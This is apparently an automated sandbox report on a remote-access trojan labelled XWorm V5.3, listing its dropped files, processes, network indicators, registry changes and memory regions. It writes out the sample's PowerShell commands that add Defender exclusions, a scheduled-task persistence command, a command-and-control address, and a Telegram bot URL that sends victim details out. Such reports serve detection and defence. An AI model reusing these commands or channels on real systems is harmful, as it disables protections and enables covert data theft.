Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Output.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\ProgramData\XClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\ProgramData\build.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mstc.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mstc.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0drb40ud.k5o.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gn3glvf.qj1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mljleyk.xan.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fgr5rg2.rno.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5emqyhj1.l4k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cff3fhm4.auj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_efjlq1gg.mgg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ica10m5q.k1f.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhg5xajd.jc3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nl01sg4m.emc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ny524qb5.ubn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oo42gmop.huk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbfoqrud.h2b.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_voejhd0j.g1g.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1gijp3l.4jg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwmutoam.l5z.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mstc.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 23:53:12
2024, mtime=Tue Apr 23 23:53:12 2024, atime=Tue Apr 23 23:53:12 2024, length=85504, window=hide
|
dropped
|
There are 15 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\Output.exe
|
"C:\Users\user\Desktop\Output.exe"
|
||
C:\ProgramData\XClient.exe
|
"C:\ProgramData\XClient.exe"
|
||
C:\ProgramData\build.exe
|
"C:\ProgramData\build.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe"
|
||
C:\Users\user\AppData\Local\Temp\mstc.exe
|
C:\Users\user\AppData\Local\Temp\mstc.exe
|
||
C:\Users\user\AppData\Local\Temp\mstc.exe
|
"C:\Users\user\AppData\Local\Temp\mstc.exe"
|
||
C:\Users\user\AppData\Local\Temp\mstc.exe
|
"C:\Users\user\AppData\Local\Temp\mstc.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 7 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
91.92.252.220:9078
|
|||
91.92.252.220
|
|||
https://api.ipify.orgcookies//settinString.Removeg
|
unknown
|
||
127.0.0.1
|
|||
https://ipinfo.io/ip%appdata%
|
unknown
|
||
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A09B6D1F69BB0E33E6F7A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203TYHZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3
|
149.154.167.220
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://tempuri.org/Endpoint/CheckConnectLR
|
unknown
|
||
http://91.92.252.220:9078
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
|
unknown
|
||
http://tempuri.org/Endpoint/CheckConnectResponse
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://www.micom/pkiops/Docs/ry.htm0
|
unknown
|
||
https://api.ip.sb/geoip%USERPEnvironmentROFILE%
|
unknown
|
||
http://www.microsoft.co
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://schemas.xmlsoap.org/soap/envelope/
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://osoft.co
|
unknown
|
||
http://91.92.252.220:9078/
|
unknown
|
||
http://tempuri.org/
|
unknown
|
||
http://tempuri.org/Endpoint/CheckConnect
|
unknown
|
||
http://tempuri.org/Endpoint/EnvironmentSettingsLR
|
unknown
|
||
http://tempuri.org/Endpoint/VerifyUpdateResponse
|
unknown
|
||
http://tempuri.org/Endpoint/SetEnvironmentResponse
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://crl.m
|
unknown
|
||
http://tempuri.org/Endpoint/SetEnvironmentLR
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing
|
unknown
|
||
http://tempuri.org/Endpoint/GetUpdatesLR
|
unknown
|
||
http://tempuri.org/Endpoint/VerifyUpdateLR
|
unknown
|
||
http://tempuri.org/Endpoint/GetUpdatesResponse
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://tempuri.org/Endpoint/
|
unknown
|
||
http://tempuri.org/Endpoint/EnvironmentSettingsResponse
|
unknown
|
||
http://tempuri.org/Endpoint/CheckConnectT
|
unknown
|
||
http://tempuri.org/0
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://api.telegram.org
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://schemas.xmlsoap.org/soap/actor/next
|
unknown
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 38 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
ip-api.com
|
208.95.112.1
|
||
api.telegram.org
|
149.154.167.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
91.92.252.220
|
unknown
|
Bulgaria
|
||
127.0.0.1
|
unknown
|
unknown
|
||
208.95.112.1
|
ip-api.com
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
mstc
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
|
FileDirectory
|
There are 20 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2961000
|
trusted library allocation
|
page read and write
|
||
29F0000
|
trusted library allocation
|
page read and write
|
||
342000
|
unkown
|
page readonly
|
||
12428000
|
trusted library allocation
|
page read and write
|
||
7B2000
|
unkown
|
page readonly
|
||
2A5D000
|
trusted library allocation
|
page read and write
|
||
29DC000
|
trusted library allocation
|
page read and write
|
||
12961000
|
trusted library allocation
|
page read and write
|
||
7FF8870A0000
|
trusted library allocation
|
page read and write
|
||
7FF886EF2000
|
trusted library allocation
|
page read and write
|
||
DEA000
|
heap
|
page read and write
|
||
2F7E9B9000
|
stack
|
page read and write
|
||
BA6303000
|
stack
|
page read and write
|
||
D20868C000
|
stack
|
page read and write
|
||
1B2F0000
|
heap
|
page execute and read and write
|
||
177CE282000
|
trusted library allocation
|
page read and write
|
||
7FF886E06000
|
trusted library allocation
|
page execute and read and write
|
||
BA78CC000
|
stack
|
page read and write
|
||
1CD33020000
|
trusted library allocation
|
page read and write
|
||
1CD4A3F0000
|
heap
|
page read and write
|
||
1B2F3000
|
heap
|
page execute and read and write
|
||
1A7DD000
|
stack
|
page read and write
|
||
177DD251000
|
trusted library allocation
|
page read and write
|
||
D2077B9000
|
stack
|
page read and write
|
||
1368F01D000
|
trusted library allocation
|
page read and write
|
||
7FF887110000
|
trusted library allocation
|
page read and write
|
||
1CD4A520000
|
trusted library allocation
|
page read and write
|
||
242CDCC0000
|
heap
|
page read and write
|
||
1C574000
|
heap
|
page read and write
|
||
7FF8870C0000
|
trusted library allocation
|
page read and write
|
||
7FF886DC6000
|
trusted library allocation
|
page read and write
|
||
7FF886DC0000
|
trusted library allocation
|
page execute and read and write
|
||
4F11000
|
trusted library allocation
|
page read and write
|
||
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
7FF887190000
|
trusted library allocation
|
page read and write
|
||
7FF886D21000
|
trusted library allocation
|
page read and write
|
||
1368FBA1000
|
trusted library allocation
|
page read and write
|
||
7FF886E30000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886F18000
|
trusted library allocation
|
page read and write
|
||
1CD32B55000
|
trusted library allocation
|
page read and write
|
||
7FF886D24000
|
trusted library allocation
|
page read and write
|
||
242D1151000
|
trusted library allocation
|
page read and write
|
||
6F7000
|
stack
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
1BE2D000
|
stack
|
page read and write
|
||
1369E421000
|
trusted library allocation
|
page read and write
|
||
4F30000
|
trusted library allocation
|
page read and write
|
||
4FD0000
|
trusted library allocation
|
page read and write
|
||
7FF886D10000
|
trusted library allocation
|
page read and write
|
||
130000
|
unkown
|
page readonly
|
||
2853000
|
trusted library allocation
|
page read and write
|
||
177E56A0000
|
heap
|
page read and write
|
||
1CD33660000
|
trusted library allocation
|
page read and write
|
||
2F7F70D000
|
stack
|
page read and write
|
||
7FF887140000
|
trusted library allocation
|
page execute and read and write
|
||
4F4000
|
stack
|
page read and write
|
||
7FF887000000
|
trusted library allocation
|
page read and write
|
||
7FF88713E000
|
trusted library allocation
|
page read and write
|
||
24AD000
|
stack
|
page read and write
|
||
7FF886FA0000
|
trusted library allocation
|
page read and write
|
||
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
7FF886EF4000
|
trusted library allocation
|
page read and write
|
||
177CEAE3000
|
trusted library allocation
|
page read and write
|
||
177CB774000
|
heap
|
page read and write
|
||
29EE000
|
trusted library allocation
|
page read and write
|
||
CC6000
|
heap
|
page read and write
|
||
4F80000
|
trusted library allocation
|
page read and write
|
||
2AA5000
|
trusted library allocation
|
page read and write
|
||
7FF886DF6000
|
trusted library allocation
|
page execute and read and write
|
||
1F0000
|
heap
|
page read and write
|
||
7FF887030000
|
trusted library allocation
|
page read and write
|
||
1368F066000
|
trusted library allocation
|
page read and write
|
||
7FF886D23000
|
trusted library allocation
|
page execute and read and write
|
||
1CD32EF2000
|
trusted library allocation
|
page read and write
|
||
7FF886D13000
|
trusted library allocation
|
page execute and read and write
|
||
272C000
|
trusted library allocation
|
page read and write
|
||
13690240000
|
trusted library allocation
|
page read and write
|
||
BA6877000
|
stack
|
page read and write
|
||
2726000
|
trusted library allocation
|
page read and write
|
||
5584C8D000
|
stack
|
page read and write
|
||
920000
|
heap
|
page read and write
|
||
242CDBC0000
|
heap
|
page read and write
|
||
177E58AC000
|
heap
|
page read and write
|
||
1368F726000
|
trusted library allocation
|
page read and write
|
||
558423B000
|
stack
|
page read and write
|
||
242E7DDB000
|
heap
|
page read and write
|
||
7DF4064B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886F10000
|
trusted library allocation
|
page read and write
|
||
1B2A0000
|
heap
|
page read and write
|
||
242E7D3F000
|
heap
|
page read and write
|
||
5583B7E000
|
stack
|
page read and write
|
||
1368C930000
|
heap
|
page read and write
|
||
7FF886D1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886EEA000
|
trusted library allocation
|
page read and write
|
||
5E40000
|
heap
|
page read and write
|
||
7FF887030000
|
trusted library allocation
|
page read and write
|
||
7FF886ED0000
|
trusted library allocation
|
page read and write
|
||
7FF887150000
|
trusted library allocation
|
page read and write
|
||
1B3E0000
|
heap
|
page read and write
|
||
6E0000
|
heap
|
page read and write
|
||
132000
|
unkown
|
page readonly
|
||
7FF886DD0000
|
trusted library allocation
|
page execute and read and write
|
||
242D0B07000
|
trusted library allocation
|
page read and write
|
||
7FF886DE0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886F12000
|
trusted library allocation
|
page read and write
|
||
1050000
|
heap
|
page execute and read and write
|
||
2A29000
|
trusted library allocation
|
page read and write
|
||
242D0691000
|
trusted library allocation
|
page read and write
|
||
1CD329C8000
|
trusted library allocation
|
page read and write
|
||
7FF886FB0000
|
trusted library allocation
|
page read and write
|
||
242E7D00000
|
heap
|
page execute and read and write
|
||
1CD30520000
|
heap
|
page read and write
|
||
14E0000
|
trusted library allocation
|
page read and write
|
||
1CD4A664000
|
heap
|
page read and write
|
||
C5C000
|
heap
|
page read and write
|
||
242E80A2000
|
heap
|
page read and write
|
||
6E5000
|
heap
|
page read and write
|
||
242CDD9C000
|
heap
|
page read and write
|
||
7B0000
|
unkown
|
page readonly
|
||
7FF886EC0000
|
trusted library allocation
|
page read and write
|
||
7FF886FE0000
|
trusted library allocation
|
page read and write
|
||
EB0000
|
trusted library allocation
|
page read and write
|
||
D20848C000
|
stack
|
page read and write
|
||
606000
|
heap
|
page read and write
|
||
1B07E000
|
stack
|
page read and write
|
||
7FF886DEC000
|
trusted library allocation
|
page execute and read and write
|
||
177E5650000
|
heap
|
page execute and read and write
|
||
242E8093000
|
heap
|
page read and write
|
||
7FF887170000
|
trusted library allocation
|
page read and write
|
||
1AF7F000
|
stack
|
page read and write
|
||
4B00000
|
trusted library allocation
|
page read and write
|
||
91E000
|
stack
|
page read and write
|
||
1B078000
|
heap
|
page read and write
|
||
242E7DB0000
|
heap
|
page read and write
|
||
20F0000
|
heap
|
page execute and read and write
|
||
7FF886EB2000
|
trusted library allocation
|
page read and write
|
||
1CD303D7000
|
heap
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
7FF886D1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887064000
|
trusted library allocation
|
page read and write
|
||
1BD00000
|
heap
|
page execute and read and write
|
||
242CDD58000
|
heap
|
page read and write
|
||
1B8F0000
|
heap
|
page read and write
|
||
3151000
|
trusted library allocation
|
page read and write
|
||
1CD32E04000
|
trusted library allocation
|
page read and write
|
||
136A6A00000
|
heap
|
page execute and read and write
|
||
1CD32D4A000
|
trusted library allocation
|
page read and write
|
||
7FF886F30000
|
trusted library allocation
|
page read and write
|
||
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
521E000
|
stack
|
page read and write
|
||
1368F134000
|
trusted library allocation
|
page read and write
|
||
1368FC87000
|
trusted library allocation
|
page read and write
|
||
11C0000
|
heap
|
page read and write
|
||
7FF886D1D000
|
trusted library allocation
|
page execute and read and write
|
||
D2075FD000
|
stack
|
page read and write
|
||
5583E79000
|
stack
|
page read and write
|
||
12A51000
|
trusted library allocation
|
page read and write
|
||
7FF886D44000
|
trusted library allocation
|
page read and write
|
||
546000
|
heap
|
page read and write
|
||
D207739000
|
stack
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
177E58A8000
|
heap
|
page read and write
|
||
1CD4A748000
|
heap
|
page read and write
|
||
CC0000
|
trusted library allocation
|
page read and write
|
||
24C0000
|
trusted library allocation
|
page read and write
|
||
55840BF000
|
stack
|
page read and write
|
||
C56000
|
heap
|
page read and write
|
||
2721000
|
trusted library allocation
|
page read and write
|
||
177CEB9C000
|
trusted library allocation
|
page read and write
|
||
242CF660000
|
trusted library allocation
|
page read and write
|
||
21FF000
|
stack
|
page read and write
|
||
7FF886F70000
|
trusted library allocation
|
page read and write
|
||
177CD010000
|
heap
|
page readonly
|
||
28EE000
|
stack
|
page read and write
|
||
1CD304F0000
|
heap
|
page readonly
|
||
242DFAEA000
|
trusted library allocation
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
12A8000
|
heap
|
page read and write
|
||
1CD3229D000
|
trusted library allocation
|
page read and write
|
||
177DD538000
|
trusted library allocation
|
page read and write
|
||
7FF886F70000
|
trusted library allocation
|
page read and write
|
||
4F70000
|
trusted library allocation
|
page read and write
|
||
2F7E777000
|
stack
|
page read and write
|
||
242E7F2F000
|
heap
|
page read and write
|
||
285A000
|
trusted library allocation
|
page read and write
|
||
1CD4A3A4000
|
heap
|
page read and write
|
||
1B983000
|
heap
|
page read and write
|
||
7FF886EC0000
|
trusted library allocation
|
page read and write
|
||
1CD41E01000
|
trusted library allocation
|
page read and write
|
||
BA76CE000
|
stack
|
page read and write
|
||
1CA7D000
|
stack
|
page read and write
|
||
D20737E000
|
stack
|
page read and write
|
||
23FA000
|
trusted library allocation
|
page execute and read and write
|
||
1BC2F000
|
stack
|
page read and write
|
||
1369E7FF000
|
trusted library allocation
|
page read and write
|
||
4F20000
|
trusted library allocation
|
page read and write
|
||
1C42C000
|
stack
|
page read and write
|
||
2402000
|
trusted library allocation
|
page read and write
|
||
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
7FF886D6C000
|
trusted library allocation
|
page execute and read and write
|
||
24D0000
|
heap
|
page read and write
|
||
2400000
|
trusted library allocation
|
page read and write
|
||
242E8220000
|
heap
|
page read and write
|
||
4F41000
|
trusted library allocation
|
page read and write
|
||
2F7E8BE000
|
stack
|
page read and write
|
||
7FF886D14000
|
trusted library allocation
|
page read and write
|
||
1368F541000
|
trusted library allocation
|
page read and write
|
||
177E58BC000
|
heap
|
page read and write
|
||
4F02000
|
trusted library allocation
|
page read and write
|
||
7FF887060000
|
trusted library allocation
|
page read and write
|
||
BA63CF000
|
stack
|
page read and write
|
||
1368C9C9000
|
heap
|
page read and write
|
||
1368E4A7000
|
trusted library allocation
|
page read and write
|
||
242E7E05000
|
heap
|
page read and write
|
||
1368F38F000
|
trusted library allocation
|
page read and write
|
||
1AECD000
|
stack
|
page read and write
|
||
7FF886F50000
|
trusted library allocation
|
page read and write
|
||
7FF886EC1000
|
trusted library allocation
|
page read and write
|
||
1368F6C4000
|
trusted library allocation
|
page read and write
|
||
1B3E3000
|
heap
|
page read and write
|
||
314E000
|
stack
|
page read and write
|
||
1131000
|
stack
|
page read and write
|
||
7FF886E30000
|
trusted library allocation
|
page execute and read and write
|
||
1CD303CE000
|
heap
|
page read and write
|
||
23F0000
|
trusted library allocation
|
page read and write
|
||
C7B000
|
heap
|
page read and write
|
||
177DD53E000
|
trusted library allocation
|
page read and write
|
||
7FF887080000
|
trusted library allocation
|
page read and write
|
||
136A642D000
|
heap
|
page read and write
|
||
242DF871000
|
trusted library allocation
|
page read and write
|
||
1B945000
|
heap
|
page read and write
|
||
1368F393000
|
trusted library allocation
|
page read and write
|
||
177E58E2000
|
heap
|
page read and write
|
||
18812010000
|
heap
|
page read and write
|
||
7FF886FE0000
|
trusted library allocation
|
page read and write
|
||
4B04000
|
trusted library allocation
|
page read and write
|
||
C00000
|
heap
|
page read and write
|
||
2950000
|
heap
|
page read and write
|
||
291E000
|
stack
|
page read and write
|
||
1CD4A660000
|
heap
|
page read and write
|
||
1368E370000
|
heap
|
page read and write
|
||
1368FFA2000
|
trusted library allocation
|
page read and write
|
||
242D15DD000
|
trusted library allocation
|
page read and write
|
||
7FF886EE1000
|
trusted library allocation
|
page read and write
|
||
7FF887075000
|
trusted library allocation
|
page read and write
|
||
4EDE000
|
stack
|
page read and write
|
||
7FF886D6C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886F20000
|
trusted library allocation
|
page execute and read and write
|
||
6A7000
|
heap
|
page read and write
|
||
EC5000
|
heap
|
page read and write
|
||
177CF076000
|
trusted library allocation
|
page read and write
|
||
7FF886D4B000
|
trusted library allocation
|
page read and write
|
||
7FF887170000
|
trusted library allocation
|
page read and write
|
||
B11000
|
stack
|
page read and write
|
||
177E59D9000
|
heap
|
page read and write
|
||
8DE000
|
heap
|
page read and write
|
||
136A6987000
|
heap
|
page read and write
|
||
1C32C000
|
stack
|
page read and write
|
||
2F7F80C000
|
stack
|
page read and write
|
||
1368C948000
|
heap
|
page read and write
|
||
2AEE000
|
trusted library allocation
|
page read and write
|
||
242DFAF0000
|
trusted library allocation
|
page read and write
|
||
7FF8870A0000
|
trusted library allocation
|
page read and write
|
||
4B10000
|
heap
|
page execute and read and write
|
||
5030000
|
trusted library allocation
|
page read and write
|
||
1CFBE000
|
stack
|
page read and write
|
||
177CD71D000
|
trusted library allocation
|
page read and write
|
||
7FF887180000
|
trusted library allocation
|
page read and write
|
||
C74000
|
heap
|
page read and write
|
||
177CB6E5000
|
heap
|
page read and write
|
||
2410000
|
heap
|
page execute and read and write
|
||
242D057F000
|
trusted library allocation
|
page read and write
|
||
7FF887140000
|
trusted library allocation
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
1CD420C1000
|
trusted library allocation
|
page read and write
|
||
242E803F000
|
heap
|
page read and write
|
||
242D1622000
|
trusted library allocation
|
page read and write
|
||
614000
|
heap
|
page read and write
|
||
9B7000
|
heap
|
page read and write
|
||
1CD3048D000
|
heap
|
page read and write
|
||
EEE000
|
stack
|
page read and write
|
||
1368E375000
|
heap
|
page read and write
|
||
315F000
|
trusted library allocation
|
page read and write
|
||
177CB735000
|
heap
|
page read and write
|
||
242E7C50000
|
heap
|
page execute and read and write
|
||
242E7D28000
|
heap
|
page read and write
|
||
7FF887100000
|
trusted library allocation
|
page read and write
|
||
7FF886D34000
|
trusted library allocation
|
page read and write
|
||
A10000
|
trusted library allocation
|
page read and write
|
||
1B9AB000
|
heap
|
page read and write
|
||
1CD420CB000
|
trusted library allocation
|
page read and write
|
||
7FF886FF0000
|
trusted library allocation
|
page read and write
|
||
242E7E30000
|
heap
|
page read and write
|
||
242E80A4000
|
heap
|
page read and write
|
||
7FF886D1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887120000
|
trusted library allocation
|
page read and write
|
||
1D3BE000
|
stack
|
page read and write
|
||
1CD32D41000
|
trusted library allocation
|
page read and write
|
||
1B36E000
|
stack
|
page read and write
|
||
D2076BE000
|
stack
|
page read and write
|
||
2AC7000
|
trusted library allocation
|
page read and write
|
||
177CB778000
|
heap
|
page read and write
|
||
177CB6E0000
|
heap
|
page read and write
|
||
BA69F9000
|
stack
|
page read and write
|
||
7FF887170000
|
trusted library allocation
|
page read and write
|
||
11E8000
|
heap
|
page read and write
|
||
7FF887020000
|
trusted library allocation
|
page read and write
|
||
7FF887030000
|
trusted library allocation
|
page read and write
|
||
95F000
|
heap
|
page read and write
|
||
7FF886D10000
|
